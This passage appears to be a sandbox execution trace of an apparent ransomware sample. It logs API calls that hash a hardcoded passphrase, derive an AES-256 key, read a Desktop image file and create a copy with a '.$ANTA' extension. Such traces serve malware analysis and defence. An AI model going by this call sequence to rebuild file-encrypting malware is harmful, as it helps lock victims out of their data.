lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0122.343] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0122.343] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0122.343] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.343] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.344] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0122.344] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796de8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0122.344] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0122.344] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796ee8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0122.344] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0122.345] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0122.357] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0122.357] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0122.358] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0122.358] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0122.358] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0122.358] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.358] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0122.358] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.358] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0122.358] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43caa18, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0122.358] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0122.358] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0122.358] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2728, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0122.358] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0122.358] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0122.358] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2c08, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0122.358] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.358] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.358] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0122.358] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca7d8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0122.358] CryptHashData (hHash=0x41ac040, pbData=0x17e2728, dwDataLen=0x22, dwFlags=0x1) returned 1 [0122.358] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.359] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0122.359] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0122.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca8c8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0122.359] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac040, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac2c0) returned 1 [0122.359] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.359] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0122.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796f08, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0122.359] CryptDestroyHash (hHash=0x41ac040) returned 1 [0122.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0122.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea6b8 [0122.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0122.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0122.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0122.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0122.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0122.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0122.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0122.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0122.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0122.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0122.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0122.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0122.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0122.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0122.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0122.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0122.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0122.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0122.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9578 [0122.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0122.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0122.360] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0122.360] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0122.360] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0122.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0122.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0122.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0122.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0122.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0122.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0122.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0122.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0122.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0122.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eb450 [0122.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0122.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0122.361] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\BwLCz.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\bwlcz.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0122.361] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.361] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0122.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0122.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0122.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0122.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0122.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0122.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0122.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0122.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0122.361] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0122.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0122.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0122.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0122.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0122.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0122.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0122.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0122.362] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0122.362] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0122.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0122.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0122.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0122.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0122.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0122.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0122.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0122.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0122.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0122.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0122.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0122.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0122.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0122.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0122.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0122.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0122.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0122.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0122.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0122.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0122.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0122.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0122.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0122.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0122.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0122.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0122.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a3f8 [0122.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0122.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392110 [0122.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0122.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43920a0 [0122.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a3f8 | out: hHeap=0x1780000) returned 1 [0122.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0122.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0122.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0122.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0122.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0122.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392110 | out: hHeap=0x1780000) returned 1 [0122.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0122.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0122.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0122.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0122.363] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0122.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0122.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0122.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43920a0 | out: hHeap=0x1780000) returned 1 [0122.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0122.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0122.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0122.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x499a008 [0122.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0122.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0122.364] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\BwLCz.jpg.$ANTA" (normalized: "c:\\users\\fd1hvy\\desktop\\bwlcz.jpg.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0122.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0122.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0122.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0122.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0122.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0122.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0122.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0122.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0122.364] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0122.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0122.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0122.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0122.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0122.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0122.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0122.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0122.365] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0122.365] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0122.365] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0122.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0122.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0122.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0122.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0122.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0122.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0122.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0122.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0122.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0122.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0122.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0122.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0122.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e07020 [0122.368] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0122.368] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, 